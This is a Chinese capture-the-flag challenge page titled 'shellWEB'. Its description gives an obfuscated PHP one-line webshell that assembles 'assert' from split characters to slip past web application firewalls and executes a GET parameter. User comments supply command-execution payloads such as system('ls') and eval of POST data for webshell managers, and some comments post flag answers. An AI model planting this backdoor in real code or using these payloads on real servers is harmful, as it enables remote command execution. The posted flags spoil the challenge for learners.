shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 9043
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zfly 1年前

?s=system('ls') ?s=system('cat fla*')

回复 1

八一卜kod 1年前

cat

回复 0

freestyle 1年前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 1

000ooo 1年前

?s=eval+($_POST['123'])

回复 2

ruien 1年前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 1年前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 1年前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 1年前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 1年前

?s=eval($_POST["cmd"])

回复 0

15824777912 1年前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

星宇Sec 攻破了该题 6小时前
zjw00 攻破了该题 7小时前
XYZ321 攻破了该题 8小时前
wzzzh 攻破了该题 8小时前
huya. 攻破了该题 18小时前
luze 攻破了该题 1天前
lzr19960502 攻破了该题 1天前
一颗栗子君 攻破了该题 1天前
yezia 攻破了该题 1天前
ly9henxihuan 攻破了该题 1天前
zzz122 攻破了该题 1天前
快乐每一天 攻破了该题 2天前
Alivesen 攻破了该题 2天前
ohltc 攻破了该题 2天前
凌源u 攻破了该题 2天前
镜花水月 攻破了该题 3天前
AlfaRivieor 攻破了该题 3天前
错过的恨 攻破了该题 3天前
mahiru 攻破了该题 3天前
yestcrday 攻破了该题 3天前
问题反馈